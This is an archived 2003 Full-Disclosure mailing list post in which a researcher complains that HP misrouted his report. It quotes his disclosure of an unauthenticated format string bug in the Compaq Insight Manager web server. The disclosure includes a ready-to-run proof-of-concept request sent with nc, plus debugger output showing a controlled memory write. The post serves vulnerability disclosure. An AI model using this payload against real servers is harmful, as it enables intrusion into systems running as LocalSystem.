[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <200308041556.h74FutXM004038@ns.wcd.se>
From: mcw at wcd.se (mcw@....se)
Subject: Re: FW: Please investigate (KMM6769685V17014L0KM)
> Not for security-alert@...com. Please make sure appropriate
> HP organization replies to the customer:
>
> mcw@....se
>
>
> Yours truly,
> SOFTWARE SECURITY RESPONSE TEAM (SSRT)
> Hewlett-Packard Company
> HP Services
.....
Okay, so this formatstring bug in WBEM Web server is not a Security issue?
You can test it on your own, nearest production server or client,
no matter what box you test this on, only one thing,
it _must_ have Compaq Insight Manager installed.
(Hint: You don't need any login/password, as this issue is in the Web server)
I give a shit about this bug, i was only informing you about it,
but if this sick mailing continues every time i report a SECURITY issue
i have found to you, i'll never bother you againg and only post it
to Full-Disclosure list.. (Same crap as last time... gah)
Have a nice day
/bashis
>
>
>
> Dear Compaq Customer,
>
>
> It would help me to provide you with an accurate solution, if you could
> provide the following additional details:
>
> * The name and model of your Compaq product, for example: Presario
> 5400.
> * The hardware or software that has been installed recently.
> * The serial number. The serial number can be found on a sticker
> attached to the side of your computer.
> * The exact error message you received and the events that led to
> the error (i.e., whether the error message was received after a
> program was installed.)
> * The operating system installed on the computer (for example: Windows
> 98.)
>
> With the above information, I will be able to investigate the issue
> further and provide you with a solution.
>
> Thank you for taking the time to contact us. Please reply if I can be
> of further assistance.
>
> Regards,
>
> Suresh Babu Sharath
> HP Consumer eSupport
>
> For additional or future service assistance, you can post your question
> to the Customer Communities at: http://www.compaq.com/communities
>
> "Our advice is strictly limited to the question(s) asked and is based on
> the information provided to us. HP does not assume any responsibility
> or liability for the advice given and shall not be liable for any
> direct, indirect, special, incidental or consequential damages in
> connection with the use of this information. Always back up your data.
> For more information, including technical information updates, please
> visit our Web site at http://www.hp.com/go/support."
>
>
> Original Message Follows:
> -------------------------
>
> This message has been rerouted to you by the HP.COM email router. If
> this message has been sent to you in error, please forward back to the
> email router mailbox at REROUTER,HPCOM per HP email directory or HPCOM
> REROUTER per CPQ email directory.
> Original message follows:
> -------------------------
>
>
>
> Not for security-alert@...com. Please make sure appropriate
> HP organization replies to the customer:
>
> mcw@....se
>
>
> Yours truly,
> SOFTWARE SECURITY RESPONSE TEAM (SSRT)
> Hewlett-Packard Company
> HP Services
>
> ------- Forwarded Message
>
> Date: Sun, 03 Aug 2003 17:03:43 +0200
> From: mcw@....se
> To: security-alert@...com
> cc: full-disclosure@...ts.netsys.com
> Subject: formatstring bug in Compaq HTTP Servers
>
> Hi there
>
> There is a formatstring bug in Compaq HTTP Servers.
> [in <!.DebugSearchPaths>?Url=> requests]
>
> The HTTP server runs with LocalSystem account.
>
> Versions:
> All versions i have tested had this formatstring bug.
>
> To be shure that it wasn't allready fixed, i downloaded this new
> version..
> Insight Management Agent
> Version: 5.00 H (01/17/2003)
>
> http://www29.compaq.com/falco/sp_detail.asp?Model=4214&Div=2&Os=93&Softw
> areVer=
> 17022
>
> Request:
> $ printf "GET /<\x21.DebugSearchPaths>?Url=`perl -e 'print
> "A"x14'`BBBB`perl -e
> 'print
> ".%%x"x1208'`%%n> HTTP/1.0\n\n" | nc 192.168.235.131 2301
>
> Result:
> 0:005> g
> (9a8.934): Access violation - code c0000005 (first chance)
> First chance exceptions are reported before any exception handling.
> This exception may be expected and handled.
> eax=42424242 ebx=0000006e ecx=000012eb edx=00000200 esi=00b440c0
> edi=00000800
> eip=780127a8 esp=010287f8 ebp=01028a50 iopl=0 nv up ei pl zr na
> po nc
> cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000
> efl=00010246
> MSVCRT!setvbuf+65d:
> 780127a8 8908 mov [eax],ecx
> ds:0023:42424242=????????
> *** WARNING: Unable to verify checksum for
> C:\PROGRA~1\Compaq\COMPAQ~1\CPQWEB~1
> \CpqHMMO.dll
> *** ERROR: Symbol file could not be found. Defaulted to export symbols
> for C:PROGRA~1\Compaq
> \COMPAQ~1\CPQWEB~1\CpqHMMO.dll -
>
> Have a nice day
> /bashis
>
>
> ------- End of Forwarded Message
>
>
Powered by blists - more mailing lists